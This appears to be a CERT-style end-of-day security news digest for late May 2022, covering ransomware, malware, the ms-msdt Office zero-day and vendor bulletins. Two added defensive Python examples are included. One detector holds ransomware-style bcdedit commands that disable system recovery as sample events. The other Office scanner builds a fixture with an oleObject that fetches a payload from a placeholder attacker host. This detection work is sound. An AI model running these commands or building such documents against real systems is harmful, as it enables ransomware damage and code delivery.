End-of-Day report
Timeframe: Friday 27-05-2022 18:00 - Monday 30-05-2022 18:00
Handler: Thomas Pribitzer
Co-Handler: n/a
News
Clop ransomware gang is back, hits 21 victims in a single month
After effectively shutting down their entire operation for several months, between November and February, the Clop ransomware gang is now back, according to NCC Group researchers.
https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/
New Windows Subsystem for Linux malware steals browser auth cookies
Hackers are showing an increased interest in the Windows Subsystem for Linux (WSL) as an attack surface as they build new malware, the more advanced samples being suitable for espionage and downloading additional malicious modules.
https://www.bleepingcomputer.com/news/security/new-windows-subsystem-for-linux-malware-steals-browser-auth-cookies/
New GoodWill Ransomware Forces Victims to Donate Money and Clothes to the Poor
Cybersecurity researchers have disclosed a new ransomware strain called GoodWill that compels victims to donate to social causes and to provide financial assistance to people in need.
https://thehackernews.com/2022/05/new-goodwill-ransomware-forces-victims.html
Understanding CVE-2022-22972 (VMWare Workspace One Access Auth Bypass)
We've got a copy of the vulnerable version of VMWare Workspace One Access, and we've gone through the extremely boring process of setting it up (oh the joys of vulnerability research). At this stage, we want to try and narrow down exactly where this vulnerability exists in code.
https://blog.assetnote.io/2022/05/27/understanding-cve-2022-22972-vmware-workspace-one-access/
Malicious browser extension: ChromeLoader arrives disguised as an ISO
A malicious extension can route all browser traffic through unwanted servers and thus siphon off data. ChromeLoader goes about this in a tricky way.
https://heise.de/-7126317
Problems with your life insurance? Beware of advisory services from konsumentenschuetzer.com
On the internet you will find the advisory agency 'Konsumentenschützer', which reviews your contract and, if necessary, files a lawsuit against your insurer. We advise caution.
https://www.watchlist-internet.at/news/probleme-mit-ihrer-lebensversicherung-vorsicht-vor-beratungsleistungen-von-konsumentenschuetzercom/
Microsoft finds vulnerabilities in apps of major mobile carriers (May 2022)
The Microsoft 365 Defender Research Team has found several vulnerabilities in a mobile framework from mce Systems.
https://www.borncity.com/blog/2022/05/30/microsoft-findet-schwachstellen-in-apps-groer-mobilfunkprovider-mai-2022/
Detecting BCD Changes To Inhibit System Recovery
Earlier this year, we observed a rise in malware that inhibits system recovery. This tactic is mostly used by ransomware and wiper malware. One notable example of such malware is 'Hermetic wiper'. To inhibit recovery an attacker has many possibilities, one of which is changing the Boot Configuration Database (BCD).
https://blog.nviso.eu/2022/05/30/detecting-bcd-changes-to-inhibit-system-recovery/
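As an added illustration of the detection idea in the item above (this is example code, not NVISO's own detection logic), the script below runs over a handful of constructed process-creation events and flags bcdedit invocations that apply the two BCD settings MITRE ATT&CK T1490 associates with inhibiting recovery: disabling the Windows Recovery Environment (recoveryenabled) and suppressing boot-failure repair (bootstatuspolicy ignoreallfailures). The event records, host names and users are constructed sample data; the field names are an assumption standing in for whatever your Sysmon Event ID 1 or Security Event ID 4688 pipeline emits.

```python
import re

# Constructed sample of Windows process-creation events, reduced to the fields a
# detection needs (as found in Sysmon Event ID 1 or Security Event ID 4688).
# Hosts, users and command lines are made up for this example.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": r"CORP\alice",
     "cmdline": r"bcdedit.exe /set {default} recoveryenabled No"},
    {"host": "ws01", "user": r"CORP\alice",
     "cmdline": r'"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures'},
    {"host": "srv02", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"bcdedit /enum all"},
    {"host": "ws03", "user": r"CORP\bob",
     "cmdline": r'cmd.exe /c "bcdedit /set {current} safeboot minimal"'},
    {"host": "ws04", "user": r"CORP\carol",
     "cmdline": r"notepad.exe C:\temp\notes.txt"},
    {"host": "ws05", "user": r"CORP\dave",
     "cmdline": r'powershell.exe -c "bcdedit /set {bootmgr} displaybootmenu no"'},
]

# bcdedit accepts booleans as yes/no, true/false, 1/0 and on/off, so match every
# spelling of "disabled".
_FALSE = r"(?:no|false|0|off)"

# The two BCD settings MITRE ATT&CK T1490 (Inhibit System Recovery) lists:
# turning off WinRE, and telling the boot manager to ignore boot failures so it
# never offers automatic repair.
RECOVERY_INHIBIT_PATTERNS = [
    (re.compile(r"\brecoveryenabled\s+" + _FALSE + r"\b"),
     "WinRE disabled (recoveryenabled)"),
    (re.compile(r"\bbootstatuspolicy\s+ignoreallfailures\b"),
     "boot failure repair suppressed (bootstatuspolicy)"),
]

# bcdedit as a program name: at the start, after a path separator, or after a
# space (covers wrapping in cmd /c or powershell -c once quotes are stripped).
_BCDEDIT = re.compile(r"(?:^|[\\/ ])bcdedit(?:\.exe)?(?= |$)")


def normalize_cmdline(cmdline: str) -> str:
    """Lower-case and strip cmd.exe quoting/escaping so that
    bcdedit.exe /set ... and "bcdedit" ^/set ... compare equal."""
    s = cmdline.lower().replace("^", "").replace('"', " ").replace("'", " ")
    return re.sub(r"\s+", " ", s).strip()


def is_bcdedit_invocation(cmdline: str) -> bool:
    """True if bcdedit appears as a program anywhere in the command line."""
    return _BCDEDIT.search(normalize_cmdline(cmdline)) is not None


def detect_recovery_inhibition(events):
    """Return one finding per event that both runs bcdedit and applies a
    recovery-inhibiting setting. Enumeration (/enum) and unrelated /set values
    (safeboot, displaybootmenu) are deliberately not flagged to keep the
    signal tight; they belong in separate, lower-severity rules."""
    findings = []
    for ev in events:
        norm = normalize_cmdline(ev["cmdline"])
        if not _BCDEDIT.search(norm):
            continue
        for pattern, reason in RECOVERY_INHIBIT_PATTERNS:
            if pattern.search(norm):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "reason": reason, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in detect_recovery_inhibition(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']}: {f['reason']} <- {f['cmdline']}")
```

Expect benign hits from OS deployment and imaging tooling that sets these values on purpose; triage on parent process and user rather than suppressing the rule, since the same command issued by a user's Office or browser child process is the ransomware pattern.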
Rapidly evolving IoT malware EnemyBot now targeting Content Management System servers and Android devices
Alien Labs has discovered that EnemyBot is expanding its capabilities, exploiting recently identified vulnerabilities (2022), and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers.
https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers
GitHub RepoJacking Weakness Exploited in the Wild by Attackers
A logical flaw in GitHub allows attackers to take control over thousands of repositories, enabling the poisoning of popular open-source packages. This flaw is yet to be fixed and the steps to exploit it were recently published.
https://checkmarx.com/blog/github-repojacking-weakness-exploited-in-the-wild-by-attackers/
Vulnerabilities
New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme, (Mon, May 30th)
It was a long weekend for many European countries and it's an off-day in the US but we were aware of a new attack vector for Microsoft Office documents.
https://isc.sans.edu/diary/rss/28694
Zero-day vulnerability in Microsoft Office enables code smuggling
Security researchers have discovered a Word document that can download and execute malicious code when opened. Current software appears to protect against it.
https://heise.de/-7125635
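For triage of documents matching the two items above (the ms-msdt vector and the Office zero-day), here is an added example, not code from the ISC diary or heise, of a scanner for the package-level traces a practitioner can look for: an Office document is a zip (OOXML) package, and the reported delivery used an oleObject relationship with TargetMode="External" pointing at a remote page that invokes the ms-msdt: protocol handler. The script builds constructed sample packages in memory (not real Office files, only the parts the scanner inspects; the attacker.invalid host and file names are placeholders) and reports external OLE relationships plus any part containing the ms-msdt: scheme.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MSDT_SCHEME = re.compile(rb"ms-msdt:", re.IGNORECASE)


def build_sample_docx(rels_xml: bytes, extra_parts=None) -> bytes:
    """Build a minimal, constructed OOXML package in memory: enough of the
    package structure for the scanner to act on, not a document Word would open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   b'<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   b'<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels_xml)
        for name, data in (extra_parts or {}).items():
            z.writestr(name, data)
    return buf.getvalue()


# Constructed benign relationships: a styles part and an ordinary external hyperlink.
BENIGN_RELS = b'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.org/" TargetMode="External"/>
</Relationships>'''

# Constructed suspicious relationships: an oleObject whose target is a remote URL.
# This is the package-level shape of the technique; the remote HTML is what
# would call the ms-msdt: handler. Host and path are placeholders.
SUSPICIOUS_RELS = b'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://attacker.invalid/payload.html!" TargetMode="External"/>
</Relationships>'''


def scan_office_package(data: bytes) -> list:
    """Return (part_name, reason) findings for an OOXML package: every external
    oleObject relationship, and every part that contains the ms-msdt: scheme."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if name.endswith(".rels"):
                try:
                    root = ET.fromstring(blob)
                except ET.ParseError:
                    # A relationships part that does not parse is itself worth a look.
                    findings.append((name, "unparseable relationships part"))
                    continue
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL_TYPE:
                        findings.append((name, f"external OLE object: {rel.get('Target')}"))
            # Byte-level search so embedded HTML, RTF or other parts are covered too.
            if MSDT_SCHEME.search(blob):
                findings.append((name, "ms-msdt: protocol scheme present"))
    return findings


if __name__ == "__main__":
    sample = build_sample_docx(SUSPICIOUS_RELS)
    for part, reason in scan_office_package(sample):
        print(f"{part}: {reason}")
```

An external oleObject relationship is rare in legitimate documents and is a strong triage signal on its own; the ms-msdt: string check catches the payload stage only when it is embedded in the package rather than fetched remotely, so absence of that string proves nothing. When scanning untrusted files at scale, parse the XML with defusedxml rather than the standard library parser.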
Security updates for Monday
Security updates have been issued by Debian (modsecurity-apache, pngcheck, rsyslog, and smarty3), Fedora (firefox, golang-github-opencontainers-runc, gron, kernel, kernel-headers, kernel-tools, logrotate, mingw-pcre2, and rubygem-git), Mageia (admesh, chromium-browser-stable, golang, kernel, kernel-linus, and pidgin), Red Hat (firefox, openvswitch2.13, openvswitch2.15, openvswitch2.16, rsyslog, and thunderbird), SUSE (bind, curl, opera, pcp, postgresql12, and postgresql14), [...]
https://lwn.net/Articles/896640/
Security Bulletin: PowerVC installation on RHEL is vulnerable to MariaDB with CVE-2021-46669, CVE-2022-24048, MariaDB - 219814, MariaDB - 219815, CVE-2022-24050, CVE-2022-24052
https://www.ibm.com/blogs/psirt/security-bulletin-powervc-installation-on-rhel-is-vulnerable-to-mariadb-with-cve-2021-46669-cve-2022-24048-mariadb-219814-mariadb-219815-cve-2022-24050-cve-2022-24052/
Security Bulletin: IBM Security Guardium is affected by a number of security vulnerabilities in Netty, which is used by Guardium (CVE-2021-21290, CVE-2021-21295, CVE-2021-21409, CVE-2021-37136, CVE-2021-37137)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-a-number-of-security-vulnerabilities-in-netty-which-is-used-by-guardium-cve-2021-21290-cve-2021-21295-cve-2021-21409-cve-2021-37136-cve-2-2/
Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities in Apache Thrift
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-in-apache-thrift-3/
Security Bulletin: A vulnerability exists in golang x/crypto (CVE-2020-9283) which is consumed by IBM CICS TX Standard
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-exists-in-golang-x-crypto-cve-2020-9283-which-is-consumed-by-ibm-cics-tx-standard/
Security Bulletin: A vulnerability exists in golang x/crypto (CVE-2020-9283) which is consumed by IBM CICS TX Advanced
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-exists-in-golang-x-crypto-cve-2020-9283-which-is-consumed-by-ibm-cics-tx-advanced/
Security Bulletin: IBM Security Guardium is affected by FasterXML jackson-databind vulnerabilities (CVE-2020-25649, X-Force ID 217968)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-fasterxml-jackson-databind-vulnerabilities-cve-2020-25649-x-force-id-217968-3/
Security Bulletin: Automation Assets in IBM Cloud Pak for Integration is vulnerable to remote attack due to Moment.js CVE-2022-24785
https://www.ibm.com/blogs/psirt/security-bulletin-automation-assets-in-ibm-cloud-pak-for-integration-is-vulnerable-to-remote-attack-due-to-moment-js-cve-2022-24785/
Security Bulletin: Cross-Site Request Forgery vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) - CVE-2022-22361
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-request-forgery-vulnerability-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-cve-2022-22361/
Security Bulletin: IBM Security Guardium is affected by path traversal and crypto vulnerabilities (CVE-2021-29425, CVE-2021-39076)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-path-traversal-and-crypto-vulnerabilities-cve-2021-29425-cve-2021-39076-3/
Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-20/
MariaDB: Multiple vulnerabilities enable denial of service
http://www.cert-bund.de/advisoryshort/CB-K22-0665